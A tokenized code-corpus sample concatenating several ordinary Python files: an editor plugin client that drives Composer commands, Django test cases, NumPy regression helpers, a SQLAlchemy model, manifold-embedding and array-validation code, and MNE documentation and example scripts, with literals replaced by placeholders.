. STDOUT <EOL> ) <EOL> def OnAdd ( retcode ) : <EOL> if not retcode : <EOL> server . restart ( ) <EOL> editor . notify ( "<STR_LIT>" ) <EOL> else : <EOL> if retcode == <NUM_LIT> : <EOL> editor . error ( pathError ) <EOL> editor . error ( "<STR_LIT>" ) <EOL> def LogAdding ( ) : <EOL> retcode = stream . poll ( ) <EOL> if retcode is not None : <EOL> return OnAdd ( retcode ) <EOL> line = stream . stdout . readline ( ) <EOL> editor . log ( line ) <EOL> return True <EOL> editor . callAfter ( <NUM_LIT> , LogAdding ) <EOL> def RemovePlugin ( self , plugin ) : <EOL> composerCommand = composer + '<STR_LIT>' <EOL> command = '<STR_LIT>' . format ( <EOL> composerCommand , <EOL> plugin <EOL> ) <EOL> stream = subprocess . Popen ( <EOL> command , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> def onRemoved ( ) : <EOL> subprocess . Popen ( <EOL> '<STR_LIT>' . format ( <EOL> cli + '<STR_LIT>' + plugin <EOL> ) , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) . wait ( ) <EOL> self . RestartServer ( ) <EOL> return editor . notify ( "<STR_LIT>" ) <EOL> def LogRemoving ( ) : <EOL> retcode = stream . poll ( ) <EOL> if retcode is not None : <EOL> return onRemoved ( ) <EOL> line = stream . stdout . readline ( ) <EOL> editor . log ( line ) <EOL> return True <EOL> editor . callAfter ( <NUM_LIT> , LogRemoving ) <EOL> def Generate ( self , filepath ) : <EOL> curPath = self . GetProjectRoot ( filepath ) <EOL> stream = subprocess . Popen ( <EOL> '<STR_LIT>' + curPath + '<STR_LIT>' + cli + '<STR_LIT>' , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> def onGenerationEnd ( retcode ) : <EOL> if retcode > <NUM_LIT:0> : <EOL> if retcode == <NUM_LIT> : <EOL> editor . error ( pathError ) <EOL> else : <EOL> editor . error ( "<STR_LIT>" . format ( str ( retcode ) ) ) <EOL> return <EOL> server . restart ( ) <EOL> editor . progress ( <NUM_LIT:100> ) <EOL> editor . notify ( "<STR_LIT>" ) <EOL> def ProcessGenerationPoll ( ) : <EOL> retcode = stream . poll ( ) <EOL> if retcode is not None : <EOL> onGenerationEnd ( retcode ) <EOL> return <EOL> line = stream . stdout . readline ( ) <EOL> errorMatch = re . search ( '<STR_LIT>' , line ) <EOL> if errorMatch is not None : <EOL> retcode = <NUM_LIT:1> <EOL> editor . error ( "<STR_LIT>" . format ( <EOL> errorMatch . group ( <NUM_LIT:1> ) . replace ( "<STR_LIT:'>" , "<STR_LIT>" ) <EOL> ) ) <EOL> return <EOL> match = re . search ( '<STR_LIT>' , line ) <EOL> if match is None : <EOL> return True <EOL> progress = int ( match . group ( <NUM_LIT:1> ) ) <EOL> editor . progress ( progress ) <EOL> return True <EOL> editor . callAfter ( <NUM_LIT> , ProcessGenerationPoll ) <EOL> def StartServer ( self ) : <EOL> server . start ( ) <EOL> def StopServer ( self ) : <EOL> server . stop ( ) <EOL> def RestartServer ( self ) : <EOL> server . restart ( ) <EOL> def GetProjectRoot ( self , filepath ) : <EOL> curPath = path . dirname ( filepath ) <EOL> while curPath != '<STR_LIT:/>' and not path . exists ( <EOL> path . join ( curPath , '<STR_LIT>' ) <EOL> ) : <EOL> curPath = path . dirname ( curPath ) <EOL> if curPath == '<STR_LIT:/>' : <EOL> curPath = path . dirname ( filepath ) <EOL> return curPath <EOL> client = PadawanClient ( ) </s>
<s> "<STR_LIT>" <EOL> from __future__ import unicode_literals <EOL> import random <EOL> import string <EOL> from django . core . cache import cache <EOL> from django . test import TestCase <EOL> from . . models import Section , Size , Placement <EOL> class AdCodeDataTestCase ( TestCase ) : <EOL> "<STR_LIT>" <EOL> def tearDown ( self ) : <EOL> cache . clear ( ) <EOL> def get_random_string ( self , length = <NUM_LIT:10> ) : <EOL> return '<STR_LIT>' . join ( random . choice ( string . ascii_letters ) for x in range ( length ) ) <EOL> def create_section ( self , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> defaults = { <EOL> '<STR_LIT:name>' : self . get_random_string ( ) , <EOL> '<STR_LIT>' : self . get_random_string ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return Section . objects . create ( ** defaults ) <EOL> def create_size ( self , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> defaults = { <EOL> '<STR_LIT:name>' : self . get_random_string ( ) , <EOL> '<STR_LIT:width>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:100> ) , <EOL> '<STR_LIT>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:100> ) , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return Size . objects . create ( ** defaults ) <EOL> def create_placement ( self , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> defaults = { <EOL> '<STR_LIT:name>' : self . get_random_string ( ) , <EOL> '<STR_LIT>' : self . get_random_string ( ) , <EOL> '<STR_LIT>' : self . get_random_string ( ) , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> if '<STR_LIT:size>' not in defaults : <EOL> defaults [ '<STR_LIT:size>' ] = self . create_size ( ) <EOL> return Placement . objects . create ( ** defaults ) </s>
<s> from django . contrib . auth import authenticate <EOL> from . base import AllAccessTestCase <EOL> class AuthBackendTestCase ( AllAccessTestCase ) : <EOL> "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . user = self . create_user ( ) <EOL> self . access = self . create_access ( user = self . user ) <EOL> def test_successful_authenticate ( self ) : <EOL> "<STR_LIT>" <EOL> provider = self . access . provider <EOL> identifier = self . access . identifier <EOL> user = authenticate ( provider = provider , identifier = identifier ) <EOL> self . assertEqual ( user , self . user , "<STR_LIT>" ) <EOL> def test_provider_name ( self ) : <EOL> "<STR_LIT>" <EOL> provider = self . access . provider . name <EOL> identifier = self . access . identifier <EOL> user = authenticate ( provider = provider , identifier = identifier ) <EOL> self . assertEqual ( user , self . user , "<STR_LIT>" ) <EOL> def test_failed_authentication ( self ) : <EOL> "<STR_LIT>" <EOL> provider = self . access . provider <EOL> identifier = self . access . identifier <EOL> self . access . delete ( ) <EOL> user = authenticate ( provider = provider , identifier = identifier ) <EOL> self . assertEqual ( user , None , "<STR_LIT>" ) <EOL> def test_match_no_user ( self ) : <EOL> "<STR_LIT>" <EOL> self . access . user = None <EOL> self . access . save ( ) <EOL> user = authenticate ( provider = self . access . provider , identifier = self . access . identifier ) <EOL> self . assertEqual ( user , None , "<STR_LIT>" ) <EOL> def test_performance ( self ) : <EOL> "<STR_LIT>" <EOL> with self . assertNumQueries ( <NUM_LIT:1> ) : <EOL> authenticate ( provider = self . access . provider , identifier = self . access . identifier ) </s>
<s> import numpy as np <EOL> def load_data ( file_name ) : <EOL> data = np . loadtxt ( file_name , delimiter = '<STR_LIT:U+002C>' ) <EOL> X = data [ : , : - <NUM_LIT:1> ] <EOL> y = data [ : , - <NUM_LIT:1> : ] <EOL> return X , y <EOL> def transform_arguments ( tranformation ) : <EOL> def dec ( f ) : <EOL> def wrapper ( * args , ** kwargs ) : <EOL> t_args = map ( tranformation , args ) <EOL> t_kwargs = { k : tranformation ( v ) for k , v in kwargs . iteritems ( ) } <EOL> return f ( * t_args , ** t_kwargs ) <EOL> return wrapper <EOL> return dec <EOL> matrix_args = transform_arguments ( lambda arg : np . matrix ( arg , copy = False ) ) <EOL> matrix_args_array_only = transform_arguments ( lambda arg : np . matrix ( arg , copy = False ) if isinstance ( arg , np . ndarray ) else arg ) <EOL> @ matrix_args <EOL> def J_liner_regression ( X , y , theta ) : <EOL> temp = X * theta - y <EOL> return ( temp . T * temp / ( <NUM_LIT:2> * len ( y ) ) ) [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> @ matrix_args_array_only <EOL> def gradient_descent ( cost_function , X , y , iterations , intial_theta , alpha ) : <EOL> m = len ( y ) <EOL> theta = intial_theta <EOL> J_history = [ ] <EOL> for _ in xrange ( iterations ) : <EOL> theta = theta - ( alpha / m ) * X . T * ( X * theta - y ) <EOL> J_history . append ( cost_function ( X , y , theta ) ) <EOL> return theta , J_history <EOL> def add_zero_feature ( X , axis = <NUM_LIT:1> ) : <EOL> return np . append ( np . ones ( ( X . shape [ <NUM_LIT:0> ] , <NUM_LIT:1> ) if axis else ( <NUM_LIT:1> , X . shape [ <NUM_LIT:1> ] ) ) , X , axis = axis ) <EOL> def sigmoid ( z ) : <EOL> return <NUM_LIT:1> / ( <NUM_LIT:1> + np . exp ( - z ) ) <EOL> def lr_accuracy ( X , y , theta ) : <EOL> theta = theta [ : , np . newaxis ] <EOL> temp = sigmoid ( np . dot ( X , theta ) ) . ravel ( ) <EOL> p = np . zeros ( len ( X ) ) <EOL> p [ temp >= <NUM_LIT:0.5> ] = <NUM_LIT:1> <EOL> return np . mean ( p == y . ravel ( ) ) * <NUM_LIT:100> <EOL> @ matrix_args <EOL> def cf_lr ( theta , X , y ) : <EOL> theta = theta . T <EOL> m = len ( y ) <EOL> Z = sigmoid ( X * theta ) <EOL> J = ( - y . T * np . log ( Z ) - ( <NUM_LIT:1> - y ) . T * np . log ( <NUM_LIT:1> - Z ) ) / m <EOL> return J [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> @ matrix_args <EOL> def gf_lr ( theta , X , y ) : <EOL> theta = theta . T <EOL> m = len ( y ) <EOL> res = ( X . T * ( sigmoid ( X * theta ) - y ) ) / m <EOL> return res . A1 <EOL> @ matrix_args_array_only <EOL> def cf_lr_reg ( theta , X , y , lambda_coef ) : <EOL> theta = theta . T <EOL> m = len ( y ) <EOL> lambda_coef = float ( lambda_coef ) <EOL> Z = sigmoid ( X * theta ) <EOL> J = ( - y . T * np . log ( Z ) - ( <NUM_LIT:1> - y ) . T * np . log ( <NUM_LIT:1> - Z ) ) / m + ( lambda_coef / ( <NUM_LIT:2> * m ) ) * theta . T * theta <EOL> return J [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> @ matrix_args_array_only <EOL> def gf_lr_reg ( theta , X , y , lambda_coef ) : <EOL> theta = np . matrix ( theta . T , copy = True ) <EOL> lambda_coef = float ( lambda_coef ) <EOL> m = len ( y ) <EOL> Z = X * theta <EOL> theta [ <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:0> <EOL> res = ( X . T * ( sigmoid ( Z ) - y ) ) / m + ( lambda_coef / m ) * theta <EOL> return res . A1 <EOL> def feature_normalize ( X ) : <EOL> mu = np . mean ( X , axis = <NUM_LIT:0> ) [ np . newaxis , : ] <EOL> sigma = np . std ( X , axis = <NUM_LIT:0> ) [ np . newaxis , : ] <EOL> return mu , sigma , ( X - mu ) / sigma </s>
<s> from sqlalchemy import Column <EOL> from sqlalchemy import Integer <EOL> from sqlalchemy import String <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> Base = declarative_base ( ) <EOL> class Todo ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> task = Column ( String ( <NUM_LIT:255> ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from sqlalchemy import create_engine <EOL> from settings import DB_URI <EOL> engine = create_engine ( DB_URI ) <EOL> Base . metadata . drop_all ( engine ) <EOL> Base . metadata . create_all ( engine ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> import numpy as np <EOL> import scipy . sparse as sparse <EOL> from scipy . linalg import eigh , svd , qr , solve <EOL> from scipy . sparse import eye , csr_matrix <EOL> from . . embedding . base import BaseEmbedding <EOL> from . . utils . validation import check_array , check_random_state <EOL> from . . utils . eigendecomp import null_space , check_eigen_solver <EOL> def barycenter_graph ( distance_matrix , X , reg = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> ( N , d_in ) = X . shape <EOL> ( rows , cols ) = distance_matrix . nonzero ( ) <EOL> W = sparse . lil_matrix ( ( N , N ) ) <EOL> for i in range ( N ) : <EOL> nbrs_i = cols [ rows == i ] <EOL> n_neighbors_i = len ( nbrs_i ) <EOL> v = np . ones ( n_neighbors_i , dtype = X . dtype ) <EOL> C = X [ nbrs_i ] - X [ i ] <EOL> G = np . dot ( C , C . T ) <EOL> trace = np . trace ( G ) <EOL> if trace > <NUM_LIT:0> : <EOL> R = reg * trace <EOL> else : <EOL> R = reg <EOL> G . flat [ : : n_neighbors_i + <NUM_LIT:1> ] += R <EOL> w = solve ( G , v , sym_pos = True ) <EOL> W [ i , nbrs_i ] = w / np . sum ( w ) <EOL> return W <EOL> def locally_linear_embedding ( geom , n_components , reg = <NUM_LIT> , max_iter = <NUM_LIT:100> , <EOL> eigen_solver = '<STR_LIT>' , tol = <NUM_LIT> , random_state = None ) : <EOL> """<STR_LIT>""" <EOL> if geom . X is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if geom . adjacency_matrix is None : <EOL> geom . compute_adjacency_matrix ( ) <EOL> W = barycenter_graph ( geom . adjacency_matrix , geom . X , reg = reg ) <EOL> eigen_solver = check_eigen_solver ( eigen_solver , <EOL> size = W . shape [ <NUM_LIT:0> ] , <EOL> nvec = n_components + <NUM_LIT:1> ) <EOL> if eigen_solver != '<STR_LIT>' : <EOL> M = eye ( * W . shape , format = W . format ) - W <EOL> M = ( M . T * M ) . tocsr ( ) <EOL> else : <EOL> M = ( W . T * W - W . T - W ) . toarray ( ) <EOL> M . flat [ : : M . shape [ <NUM_LIT:0> ] + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> return null_space ( M , n_components , k_skip = <NUM_LIT:1> , eigen_solver = eigen_solver , <EOL> tol = tol , max_iter = max_iter , random_state = random_state ) <EOL> class LocallyLinearEmbedding ( BaseEmbedding ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n_components = <NUM_LIT:2> , radius = None , geom = None , <EOL> eigen_solver = '<STR_LIT>' , random_state = None , <EOL> tol = <NUM_LIT> , max_iter = <NUM_LIT:100> , reg = <NUM_LIT> ) : <EOL> self . n_components = n_components <EOL> self . radius = radius <EOL> self . geom = geom <EOL> self . eigen_solver = eigen_solver <EOL> self . random_state = random_state <EOL> self . tol = tol <EOL> self . max_iter = max_iter <EOL> self . reg = reg <EOL> def fit ( self , X , y = None , input_type = '<STR_LIT:data>' ) : <EOL> """<STR_LIT>""" <EOL> X = self . _validate_input ( X , input_type ) <EOL> self . fit_geometry ( X , input_type ) <EOL> random_state = check_random_state ( self . random_state ) <EOL> self . embedding_ , self . error_ = locally_linear_embedding ( self . geom_ , <EOL> n_components = self . n_components , <EOL> eigen_solver = self . eigen_solver , <EOL> tol = self . tol , <EOL> random_state = self . random_state , <EOL> reg = self . reg , <EOL> max_iter = self . max_iter ) <EOL> return self </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> import numbers <EOL> import numpy as np <EOL> import scipy . sparse as sp <EOL> class DataConversionWarning ( UserWarning ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> warnings . simplefilter ( "<STR_LIT>" , DataConversionWarning ) <EOL> def _assert_all_finite ( X ) : <EOL> """<STR_LIT>""" <EOL> X = np . asanyarray ( X ) <EOL> if ( X . dtype . char in np . typecodes [ '<STR_LIT>' ] and not np . isfinite ( X . sum ( ) ) <EOL> and not np . isfinite ( X ) . all ( ) ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % X . dtype ) <EOL> def _shape_repr ( shape ) : <EOL> """<STR_LIT>""" <EOL> if len ( shape ) == <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> joined = "<STR_LIT:U+002CU+0020>" . join ( "<STR_LIT>" % e for e in shape ) <EOL> if len ( shape ) == <NUM_LIT:1> : <EOL> joined += '<STR_LIT:U+002C>' <EOL> return "<STR_LIT>" % joined <EOL> def _num_samples ( x ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( x , '<STR_LIT>' ) : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % x ) <EOL> if not hasattr ( x , '<STR_LIT>' ) and not hasattr ( x , '<STR_LIT>' ) : <EOL> if hasattr ( x , '<STR_LIT>' ) : <EOL> x = np . asarray ( x ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % <EOL> type ( x ) ) <EOL> if hasattr ( x , '<STR_LIT>' ) : <EOL> if len ( x . shape ) == <NUM_LIT:0> : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % x ) <EOL> return x . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> return len ( x ) <EOL> def _ensure_sparse_format ( spmatrix , accept_sparse , dtype , copy , <EOL> force_all_finite ) : <EOL> """<STR_LIT>""" <EOL> if accept_sparse in [ None , False ] : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if dtype is None : <EOL> dtype = spmatrix . dtype <EOL> changed_format = False <EOL> if ( isinstance ( accept_sparse , ( list , tuple ) ) <EOL> and spmatrix . format not in accept_sparse ) : <EOL> spmatrix = spmatrix . asformat ( accept_sparse [ <NUM_LIT:0> ] ) <EOL> changed_format = True <EOL> if dtype != spmatrix . dtype : <EOL> spmatrix = spmatrix . astype ( dtype ) <EOL> elif copy and not changed_format : <EOL> spmatrix = spmatrix . copy ( ) <EOL> if force_all_finite : <EOL> if not hasattr ( spmatrix , "<STR_LIT:data>" ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> % spmatrix . format ) <EOL> else : <EOL> _assert_all_finite ( spmatrix . data ) <EOL> return spmatrix <EOL> def check_symmetric ( array , tol = <NUM_LIT> , raise_warning = True , <EOL> raise_exception = False ) : <EOL> """<STR_LIT>""" <EOL> if ( array . ndim != <NUM_LIT:2> ) or ( array . shape [ <NUM_LIT:0> ] != array . shape [ <NUM_LIT:1> ] ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( array . shape ) ) <EOL> if sp . issparse ( array ) : <EOL> diff = array - array . T <EOL> if diff . format not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> diff = diff . tocsr ( ) <EOL> symmetric = np . all ( abs ( diff . data ) < tol ) <EOL> else : <EOL> symmetric = np . allclose ( array , array . T , atol = tol ) <EOL> if not symmetric : <EOL> if raise_exception : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if raise_warning : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if sp . issparse ( array ) : <EOL> conversion = '<STR_LIT:to>' + array . format <EOL> array = getattr ( <NUM_LIT:0.5> * ( array + array . T ) , conversion ) ( ) <EOL> else : <EOL> array = <NUM_LIT:0.5> * ( array + array . T ) <EOL> return array <EOL> def check_random_state ( seed ) : <EOL> """<STR_LIT>""" <EOL> if seed is None or seed is np . random : <EOL> return np . random . mtrand . _rand <EOL> if isinstance ( seed , ( numbers . Integral , np . integer ) ) : <EOL> return np . random . RandomState ( seed ) <EOL> if isinstance ( seed , np . random . RandomState ) : <EOL> return seed <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % seed ) <EOL> def check_array ( array , accept_sparse = None , dtype = "<STR_LIT>" , order = None , <EOL> copy = False , force_all_finite = True , ensure_2d = True , <EOL> allow_nd = False , ensure_min_samples = <NUM_LIT:1> , ensure_min_features = <NUM_LIT:1> , <EOL> warn_on_dtype = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( accept_sparse , str ) : <EOL> accept_sparse = [ accept_sparse ] <EOL> dtype_numeric = dtype == "<STR_LIT>" <EOL> dtype_orig = getattr ( array , "<STR_LIT>" , None ) <EOL> if not hasattr ( dtype_orig , '<STR_LIT>' ) : <EOL> dtype_orig = None <EOL> if dtype_numeric : <EOL> if dtype_orig is not None and dtype_orig . kind == "<STR_LIT:O>" : <EOL> dtype = np . float64 <EOL> else : <EOL> dtype = None <EOL> if isinstance ( dtype , ( list , tuple ) ) : <EOL> if dtype_orig is not None and dtype_orig in dtype : <EOL> dtype = None <EOL> else : <EOL> dtype = dtype [ <NUM_LIT:0> ] <EOL> if sp . issparse ( array ) : <EOL> array = _ensure_sparse_format ( array , accept_sparse , dtype , copy , <EOL> force_all_finite ) <EOL> else : <EOL> array = np . array ( array , dtype = dtype , order = order , copy = copy ) <EOL> if ensure_2d : <EOL> if array . ndim == <NUM_LIT:1> : <EOL> if ensure_min_samples >= <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % estimator_name ) <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning ) <EOL> array = np . atleast_2d ( array ) <EOL> array = np . array ( array , dtype = dtype , order = order , copy = copy ) <EOL> if dtype_numeric and array . dtype . kind == "<STR_LIT:O>" : <EOL> array = array . astype ( np . float64 ) <EOL> if not allow_nd and array . ndim >= <NUM_LIT:3> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( array . ndim ) ) <EOL> if force_all_finite : <EOL> _assert_all_finite ( array ) <EOL> shape_repr = _shape_repr ( array . shape ) <EOL> if ensure_min_samples > <NUM_LIT:0> : <EOL> n_samples = _num_samples ( array ) <EOL> if n_samples < ensure_min_samples : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( n_samples , shape_repr , ensure_min_samples ) ) <EOL> if ensure_min_features > <NUM_LIT:0> and array . ndim == <NUM_LIT:2> : <EOL> n_features = array . shape [ <NUM_LIT:1> ] <EOL> if n_features < ensure_min_features : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( n_features , shape_repr , ensure_min_features ) ) <EOL> if warn_on_dtype and dtype_orig is not None and array . dtype != dtype_orig : <EOL> msg = ( "<STR_LIT>" <EOL> % ( dtype_orig , array . dtype ) ) <EOL> warnings . warn ( msg , DataConversionWarning ) <EOL> return array </s>
<s> import sys <EOL> import os <EOL> from datetime import date <EOL> import sphinx_gallery <EOL> import sphinx_bootstrap_theme <EOL> curdir = os . path . dirname ( __file__ ) <EOL> sys . path . append ( os . path . abspath ( os . path . join ( curdir , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) <EOL> sys . path . append ( os . path . abspath ( os . path . join ( curdir , '<STR_LIT>' ) ) ) <EOL> import mne <EOL> import numpy_ext . numpydoc <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> extensions += [ '<STR_LIT>' ] <EOL> extensions += [ '<STR_LIT>' ] <EOL> autosummary_generate = True <EOL> autodoc_default_flags = [ '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> td = date . today ( ) <EOL> copyright = u'<STR_LIT>' % ( td . year , <EOL> td . isoformat ( ) ) <EOL> version = mne . __version__ <EOL> release = version <EOL> unused_docs = [ ] <EOL> exclude_trees = [ '<STR_LIT>' ] <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> modindex_common_prefix = [ '<STR_LIT>' ] <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_options = { <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : "<STR_LIT:3>" , <EOL> '<STR_LIT>' : [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] , <EOL> } <EOL> html_theme_path = sphinx_bootstrap_theme . get_html_theme_path ( ) <EOL> html_logo = "<STR_LIT>" <EOL> html_favicon = "<STR_LIT>" <EOL> html_static_path = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> html_show_sourcelink = False <EOL> html_show_sphinx = False <EOL> build_dev_html = bool ( int ( os . environ . get ( '<STR_LIT>' , False ) ) ) <EOL> html_context = { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : build_dev_html } <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ] <EOL> latex_logo = "<STR_LIT>" <EOL> latex_use_parts = True <EOL> trim_doctests_flags = True <EOL> intersphinx_mapping = { '<STR_LIT>' : None } <EOL> examples_dirs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> gallery_dirs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : <EOL> from mayavi import mlab <EOL> find_mayavi_figures = True <EOL> mlab . options . offscreen = True <EOL> except Exception : <EOL> find_mayavi_figures = False <EOL> sphinx_gallery_conf = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : examples_dirs , <EOL> '<STR_LIT>' : gallery_dirs , <EOL> '<STR_LIT>' : find_mayavi_figures , <EOL> '<STR_LIT>' : os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import mne <EOL> from mne . event import make_fixed_length_events <EOL> from mne . datasets import sample <EOL> from mne . time_frequency import compute_epochs_csd <EOL> from mne . beamformer import tf_dics <EOL> from mne . viz import plot_source_spectrogram <EOL> print ( __doc__ ) <EOL> data_path = sample . data_path ( ) <EOL> raw_fname = data_path + '<STR_LIT>' <EOL> noise_fname = data_path + '<STR_LIT>' <EOL> event_fname = data_path + '<STR_LIT>' <EOL> fname_fwd = data_path + '<STR_LIT>' <EOL> subjects_dir = data_path + '<STR_LIT>' <EOL> label_name = '<STR_LIT>' <EOL> fname_label = data_path + '<STR_LIT>' % label_name <EOL> raw = mne . io . read_raw_fif ( raw_fname , preload = True ) <EOL> raw . info [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> left_temporal_channels = mne . read_selection ( '<STR_LIT>' ) <EOL> picks = mne . pick_types ( raw . info , meg = '<STR_LIT>' , eeg = False , eog = False , <EOL> stim = False , exclude = '<STR_LIT>' , <EOL> selection = left_temporal_channels ) <EOL> raw . pick_channels ( [ raw . ch_names [ pick ] for pick in picks ] ) <EOL> reject = dict ( mag = <NUM_LIT> ) <EOL> raw . info . normalize_proj ( ) <EOL> tmin , tmax , tstep = - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> tmin_plot , tmax_plot = - <NUM_LIT> , <NUM_LIT:0.5> <EOL> event_id = <NUM_LIT:1> <EOL> events = mne . read_events ( event_fname ) <EOL> epochs = mne . Epochs ( raw , events , event_id , tmin , tmax , <EOL> baseline = None , preload = True , proj = True , reject = reject ) <EOL> raw_noise = mne . io . read_raw_fif ( noise_fname , preload = True ) <EOL> raw_noise . info [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> raw_noise . pick_channels ( [ raw_noise . ch_names [ pick ] for pick in picks ] ) <EOL> raw_noise . info . normalize_proj ( ) <EOL> events_noise = make_fixed_length_events ( raw_noise , event_id ) <EOL> epochs_noise = mne . Epochs ( raw_noise , events_noise , event_id , tmin_plot , <EOL> tmax_plot , baseline = None , preload = True , proj = True , <EOL> reject = reject ) <EOL> epochs_noise . info . normalize_proj ( ) <EOL> epochs_noise . apply_proj ( ) <EOL> epochs_noise = epochs_noise [ : len ( epochs . events ) ] <EOL> forward = mne . read_forward_solution ( fname_fwd , surf_ori = True ) <EOL> label = mne . read_label ( fname_label ) <EOL> freq_bins = [ ( <NUM_LIT:4> , <NUM_LIT:12> ) , ( <NUM_LIT:12> , <NUM_LIT:30> ) , ( <NUM_LIT:30> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> win_lengths = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ] <EOL> n_ffts = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> subtract_evoked = False <EOL> noise_csds = [ ] <EOL> for freq_bin , win_length , n_fft in zip ( freq_bins , win_lengths , n_ffts ) : <EOL> noise_csd = compute_epochs_csd ( epochs_noise , mode = '<STR_LIT>' , <EOL> fmin = freq_bin [ <NUM_LIT:0> ] , fmax = freq_bin [ <NUM_LIT:1> ] , <EOL> fsum = True , tmin = - win_length , tmax = <NUM_LIT:0> , <EOL> n_fft = n_fft ) <EOL> noise_csds . append ( noise_csd ) <EOL> stcs = tf_dics ( epochs , forward , noise_csds , tmin , tmax , tstep , win_lengths , <EOL> freq_bins = freq_bins , subtract_evoked = subtract_evoked , <EOL> n_ffts = n_ffts , reg = <NUM_LIT> , label = label ) <EOL> plot_source_spectrogram ( stcs , freq_bins , tmin = tmin_plot , tmax = tmax_plot , <EOL> source_index = None , colorbar = True ) </s>
